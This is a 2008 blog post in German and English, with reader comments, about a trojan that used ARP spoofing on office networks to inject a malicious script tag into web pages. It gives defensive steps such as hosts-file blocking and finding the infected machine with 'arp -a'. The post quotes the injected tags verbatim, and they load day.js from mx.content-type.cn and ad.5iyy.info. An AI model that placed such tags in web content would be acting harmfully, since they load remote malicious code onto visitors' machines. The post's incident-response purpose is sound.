mx.content-type.cn oder ad.5iyy.info Virus enttarnt!

english version

Update: siehe unten wie man den Virus findet

Alle Webseiten welche geladen werden enthalten an erster Stelle den Code:

<script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script>

/* Update vom 07.07.2008: Es wird jetzt ein neues JS geladen: */
<script language="javascript" SRC="http://ad.5iyy.info/day.js"></script>

Wirklich unschön wenn ein und derselbe eklige Trojaner das ganze Team blockiert.

Wir haben uns den Trojaner mittlerweile mit 7 PCs eingefangen, wo auch immer das Ding herkam.

Bis jetzt sieht es fast aus als könnte es ein Rootkit sein, da sowohl IE, FF wie auch Opera betroffen sind und Virenscanner ihn nicht finden,
verdächtige Prozesse sind auch nicht auszumachen.

Um dem Trojaner zumindest die Funktion zu nehmen kann man ganz einfach das Windows Hostfile editieren (c:\windows\system32\drivers\etc\hosts).
Dort folgende Einträge hinzufügen:
127.0.0.1 mx.content-type.cn
127.0.0.1 content-type.cn
127.0.0.1 ad.5iyy.info
127.0.0.1 5iyy.info

Danach folgendes in die Eingabeaufforderung (Start -> Ausführen) eingeben:
ipconfig /flushdns

Damit spielt man dem System vor, dass die Domain mx.content-type.cn auf dem eigenen PC liegt wodurch das Script nicht mehr geladen werden kann. Der Trojaner ist dann zumindest nicht mehr gefährlich, wenn er auch noch nicht gelöscht ist.

Folgende Virenscanner erkennen das Ding bisher nicht:

  • AntivirXP/Avira
  • LavaSoft Ad-Aware
  • Spybot Search&Destroy
  • Kaspersky Online Scanner
  • Kaspersky AntiVirus
  • AVG Antivirus
  • AVAST Antivirus
  • CCleaner

Es gibt ein Update wenn bekannt ist wie man das Teil los wird.

Schönen Gruß an mx.content-type.cn und ad.5iyy.info 🙂

Update:
Teilweise scheint der Trojaner inaktiv zu sein, nach Neustart der Netzwerkverbindung war er plötzlich wieder an Bord und in allen Browsern (ohne die Browser neu zu starten).
Es sieht danach aus als würde das Teil eine Art “unsichtbaren” (rootkit?) lokalen Proxy starten über welchen dann der komplette Traffic läuft.

Update, wir sind dem Problem auf der Spur!

Der Trojaner befindet sich nicht auf dem PC auf dem er zu sein scheint.
Probiert folgendes aus um den tatsächlichen Verursacher zu finden:

Auf dem PC auf dem der Javascript-Code eingefügt wird:
Start -> ausführen -> cmd -> “arp -a”
Ihr solltet dann eine Tabelle in folgender Form finden:
Internet Address Physical Address Type
192.168.1.1 00-40-f4-9e-57-21 dynamic
192.168.1.5 00-40-f4-9e-57-27 dynamic
192.168.1.119 00-40-f4-9e-57-21 dynamic

Sucht darin nach der “Physical Address” des Gateway-Computers oder einfach nur nach evtl. doppelt vorkommenden Adressen in der zweiten Spalte.
In kopiertem Beispiel war der PC mit der echten Adresse “192.168.1.119” der Verursacher des Übels.
Auf diesem läuft das Schadprogramm. Wir sind gerade dabei dort nach Viren zu scannen.

English version:

If you got the problem that in every loaded page appears a javascript tag like <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script> this is the solution for your problem.

The cause is a trojan horse (virus) on another computer in your network!

This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC which forwards it to the internet and filters it in order to put its malicious code.

You can find out which computer is the evil one by typing following into your command line:
arp -a
In the appearing table search for a double assigned physical address which is once assigned to the gateway IP address and once assigned to another IP.
Find out which computer is the other IP and you will have the virus host.
Scan that one for virus and malware (we are just about to conduct that scan).
 

Tags: , , ,

6 Responses to “mx.content-type.cn oder ad.5iyy.info Virus enttarnt!”

  1. zizozoro says:

    Thanks for all info about this
    but .. Have you an idea to remove it
    My kaspersky has cought him every time
    but virus try again and again
    How can i stop them

    notice:
    i have tried kasper and spyware a doctor also tried to format C but it back again
    thanks
    zizozoro

  2. admin says:

    @zizozoro

    You comment sounds a bit like you may not have searched the virus on the right computer?
    If you have located the PC on which the trojan is residing you might try AntiVir which correctly detected it in our case.
    See in my description that the infected PC is not actually the one which shows the javascript tag in loaded sites…

    Anyway at the end we scanned the drive of the infected computer on another computer because we did not really get rid of it without (removed the drives from the infected PCs and attached them by USB to another one which was running AntiVir and killed the trojan horse).

  3. Nyxem says:

    la verdad, yo no he podido solucionarlo, alguien me podria dar las instrucciones en español?

    porfavor mandarlas a mi correo:
    dark.4ngelx@gmail.com

    Gracias

    Thnkz!

  4. satish says:

    the problem in my company seems to be the virus seems to replicate elsewhere on network. for instance we have a computer 5 that is infected ,since it duplicate the mac address of the gateway. i unplug that compter. the mother virus sems to have moved to a different computer 52.

    was that the case with you guys? what were the steps followed in killing the virus after finding the infected one?

  5. admin says:

    @satish

    yes, possibly there are more computers infected.
    We’ve had 3 infected pcs till now so what we did, was to remove the HDDs from all computers in the network again and scan them all on an external pc.

    Thats how we hope to have wiped it off finally.

  6. bess says:

    thanx for giving this Imp info …………

Leave a Reply